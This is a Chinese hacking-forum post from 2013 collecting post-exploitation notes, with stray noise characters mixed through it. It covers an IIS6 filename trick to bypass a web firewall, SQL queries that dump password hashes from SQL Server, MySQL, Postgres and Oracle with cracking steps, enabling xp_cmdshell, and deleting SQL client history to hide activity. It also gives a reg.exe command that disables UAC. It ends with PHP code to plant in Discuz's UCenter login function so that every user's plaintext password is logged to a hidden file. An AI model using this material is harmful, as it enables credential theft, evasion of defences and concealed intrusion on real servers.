1 ~8 i+ P3 Z* |其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
; ~: o' s$ V* K. p" w利用II6文件解析漏洞绕过安全狗代码:
( H) [. u# {4 B# K, G0 _& B/ r;antian365.asp;antian365.jpg
. L: H, {4 R; ]* R# M& p
9 d) g* G. j. r, [各种类型数据库抓HASH破解最高权限密码!; s) y3 n& E. W& K0 a, l
1.sql server2000
% Q. `+ M# p* j/ q9 BSELECT password from master.dbo.sysxlogins where name='sa'% |; Z7 y% J0 z8 ]5 |2 e
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341) ~* ~8 q: I3 @0 y8 \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A0 ? I, s* R- n! H
0 N. m% N& \8 N, I" _0×0100- constant header4 Z4 G l5 x$ x$ S
34767D5C- salt
/ A! [8 I d b& A- T7 x8 e0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
) s \( b$ n1 T2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
( p2 d) I/ e7 g$ g( w) F" [/ ~, b: Xcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
- ]- C3 C1 q+ t PSQL server 2005:-
8 L" ^* |/ Q( qSELECT password_hash FROM sys.sql_logins where name='sa'2 {: u+ Y1 ` C" |; a9 C
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
+ e ]- T7 f9 I0 C, J0×0100- constant header
}; R) M, {5 y& j G) i993BF231-salt
) r. V1 ]. [4 O" h5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash+ Y0 [4 W! u+ C: X8 h
crack case sensitive hash in cain, try brute force and dictionary based attacks.
' [! B; L3 }7 O/ ^7 Q2 Q8 \% i5 ^& k+ |: t& q
update:- following bernardo’s comments:-
- u* W+ P- I/ L0 |* C$ f# fuse function fn_varbintohexstr() to cast password in a hex string.9 [- p. y8 v+ Z
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins, X1 w! N4 @, `% \0 K; \' D' A
3 K7 s! V& D% R8 B& }4 S" U4 R
MYSQL:-3 t8 K8 j1 C1 m% `4 D, K
P. b9 x& X& e2 a: ]$ J$ c5 \
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
; M) b R0 @4 Y5 K( l& D6 f5 T5 }0 {+ Z; ~
*mysql < 4.1
: U/ b. i3 d" A
& ^* W3 N: T* A2 \% q u. gmysql> SELECT PASSWORD(‘mypass’);% j" `7 O7 ^4 m, c& w- L
+——————–+# E8 V6 \% I4 U% z
| PASSWORD(‘mypass’) |
; P2 E- S+ v! j6 G2 H; I+——————–+
* y) W! I6 b8 j0 a3 `, t7 J| 6f8c114b58f2ce9e |9 P% D$ t+ s r8 E, Y' e2 [- L6 c
+——————–+# @# s" Y* Z) f8 U
- O# W2 [' f+ E3 s*mysql >=4.1
- `- Z* F; V8 P7 o, \
/ K2 e$ u1 a9 k& h5 {, H5 m4 x0 Pmysql> SELECT PASSWORD(‘mypass’);
) n/ ]5 r% N# U2 x9 ? [; m4 P& A+——————————————-+; L1 E& Q# }7 q' \
| PASSWORD(‘mypass’) |
9 m/ h( B% r/ n# [& @# a+——————————————-+
$ g2 ]. ~( ^( g- v: K4 O| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
3 k0 d. Q4 V! K0 }+——————————————-+
. ?& t x0 v8 O/ Y# M- \" B1 F4 T. h, B
Select user, password from mysql.user: \9 W% F6 Y; R( O* r# t
The hashes can be cracked in ‘cain and abel’
2 U; T3 c0 }% v0 d: C' a, e" f0 Y! F1 b9 |6 ?4 ?7 F
Postgres:-9 Y% p2 m! V8 k \: Q
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ `. M% J! ]1 Z% N
select usename, passwd from pg_shadow;
& D3 l I5 X$ B6 O% `; A6 t2 gusename | passwd
8 v$ C# e3 ?1 k# @* j——————+————————————-5 Y( k$ p- M7 z' l' t0 X
testuser | md5fabb6d7172aadfda4753bf0507ed4396) A2 n9 u1 u$ G5 e: j% v
use mdcrack to crack these hashes:-
8 h J" S9 i. Z! ?! |$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396( z# ~- a- C4 T6 h6 p* q, u5 c
; K6 k$ n0 p' ^0 A2 S/ ]Oracle:-
- X: J0 x; S5 |select name, password, spare4 from sys.user$
9 h6 K4 J) }. \/ \$ Ehashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
6 e" |3 k9 ?0 N" q( B8 R* j" WMore on Oracle later, i am a bit bored….
* v3 k/ \' Y1 E0 ]% u0 r5 S6 g+ v! S( n2 R8 M% d
: O) _5 L" V0 r2 B在sql server2005/2008中开启xp_cmdshell
v1 g# r! J) O( c5 ?& J3 G-- To allow advanced options to be changed. v! P+ o$ \5 u4 q2 I8 I/ x
EXEC sp_configure 'show advanced options', 1" ]3 @# Q: G$ k& w& F! O2 a: x7 O
GO* y1 {' v+ }7 @+ X) P4 V
-- To update the currently configured value for advanced options.1 `6 Y! V: u! m( V; Q
RECONFIGURE) q/ u& j/ i! [
GO
s/ V! |% m6 f( r( |5 l2 i7 p-- To enable the feature.
P/ N9 f$ F, l& G3 c* bEXEC sp_configure 'xp_cmdshell', 1
" N) ~, l) B4 [9 v5 f0 HGO) B9 h% W3 t( H( h; p
-- To update the currently configured value for this feature.9 S* j1 ? L1 z& a# L; j
RECONFIGURE9 E$ q2 i/ W$ y: l6 B+ A3 o
GO
0 X1 ]% a' Y; LSQL 2008 server日志清除,在清楚前一定要备份。) T. r8 k' J; A0 i+ d
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 v; T1 R( j5 l' S yX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin: [6 E. K; Y6 C! G" U4 s
5 o0 {4 ]: H% _9 q( Z, M5 S8 H对于SQL Server 2008以前的版本:
8 f8 x0 ^2 {3 L2 e/ T$ [* }SQL Server 2005:( z3 m6 k1 ^2 A! h
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
" R6 u4 B0 {- a& [% K& VSQL Server 2000:
" f) j4 J4 n$ M& p* z4 d清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
- G. ` f# f& ^2 f* V: N# F& t# z+ t' `1 G
本帖最后由 simeon 于 2013-1-3 09:51 编辑 u% [& j- C9 ^
3 H4 a; }# c4 q
0 G) m0 P9 \4 q8 cwindows 2008 文件权限修改$ d# z; f% B6 g/ E3 C
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
9 r+ H3 r1 ^3 i/ d/ T2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
/ C+ x9 b& V4 A( I, I+ J) v0 i一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”, ], N4 c |0 l) v9 n* V1 M
r; _$ k8 }, ~/ |0 k! S M- AWindows Registry Editor Version 5.006 B4 p# e2 E# z R5 M. p6 o
[HKEY_CLASSES_ROOT\*\shell\runas]& k# g2 X; V1 u% ^4 m$ T7 W0 P
@="管理员取得所有权"1 J3 T5 b+ o" x r. e# d
"NoWorkingDirectory"=""
6 a2 y! X% t- m3 |3 c5 j- a. B/ }% M[HKEY_CLASSES_ROOT\*\shell\runas\command]2 X3 d7 @8 Z7 h
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) x. J6 E! Q, c, S0 \1 d& C6 k"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
6 s q% m' D Y) i1 m+ ~[HKEY_CLASSES_ROOT\exefile\shell\runas2]
1 u3 m+ S* K' n$ {. a1 {@="管理员取得所有权"1 P7 Y$ b$ {( \2 E2 }7 r2 M
"NoWorkingDirectory"=""5 q8 Q U9 K# [2 u# }
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
7 c8 j5 s3 e& A2 t: [1 _! U@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 Q Z) |( A6 G' r! m$ o5 X"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 r* u; }( v' o# K9 B6 x- D
& y+ R1 X. \6 E3 K* |# n: j) q[HKEY_CLASSES_ROOT\Directory\shell\runas]" P; G. t! J. U% p/ G. ?2 Y
@="管理员取得所有权"
# h" Q7 V* g( A& }. V"NoWorkingDirectory"="", d" c7 l/ \% g) U2 W
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]- W2 Z' j( a$ D/ B. T9 _
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 n6 y- [3 z9 w. R; M D- v& z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
7 b5 V* C- x. T) U1 z* P7 e" \2 N- ~8 C, _. T5 `
! k* f0 S1 `% N# ~+ Lwin7右键“管理员取得所有权”.reg导入
$ r6 I3 \+ H1 y( F5 K9 m/ G a二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; x6 v M2 P0 a- z
1、C:\Windows这个路径的“notepad.exe”不需要替换
' G1 |/ \1 M* I$ c1 Q$ c3 V' w' e1 q6 H: Q2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 m; e% Y! V$ I, l2 ^
3、四个“notepad.exe.mui”不要管8 j2 P1 T+ y' B
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和; K/ q5 E, G' y7 E
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
4 k1 \) d" V( p" U+ y4 _9 d替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
* @! |, }' l% `5 Z% D# o替换完之后回到桌面,新建一个txt文档打开看看是不是变了。# B1 r K0 T: X z
windows 2008中关闭安全策略: + E: K) D3 u3 f6 P# q Y
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f& z, s1 s. `# e# o2 g: u
修改uc_client目录下的client.php 在
# f/ z% m" o4 y. S5 R$ D, T( ifunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
$ x0 }( ^/ k7 G+ [# J f下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
6 L: T! O8 ^& M/ K/ v" H你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw( l7 X- v% {/ C; j' W
if(getenv('HTTP_CLIENT_IP')) {
5 t6 e+ h0 G: K3 ?0 A" n$onlineip = getenv('HTTP_CLIENT_IP');
8 a V6 l; I7 k0 ?1 K+ E} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
2 k0 ?0 T) N; D6 E: ^- t$onlineip = getenv('HTTP_X_FORWARDED_FOR');' }3 c& a1 \* y( b; |, ^
} elseif(getenv('REMOTE_ADDR')) {/ U N& D4 M6 f0 Y% A
$onlineip = getenv('REMOTE_ADDR');
: k/ E4 w% K, T7 R2 t; L8 ]} else {
1 O9 p- w' H, j9 |2 f- j- p$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];2 D1 b7 r7 ?( d7 E% k
}0 z$ M$ G' E2 @
$showtime=date("Y-m-d H:i:s");
4 s- d, N& u! j$ {/ @# w $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";- P, \1 L* S1 R% S {
$handle=fopen('./data/cache/csslog.php','a+');
8 o" V) a- j; T7 F; v $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对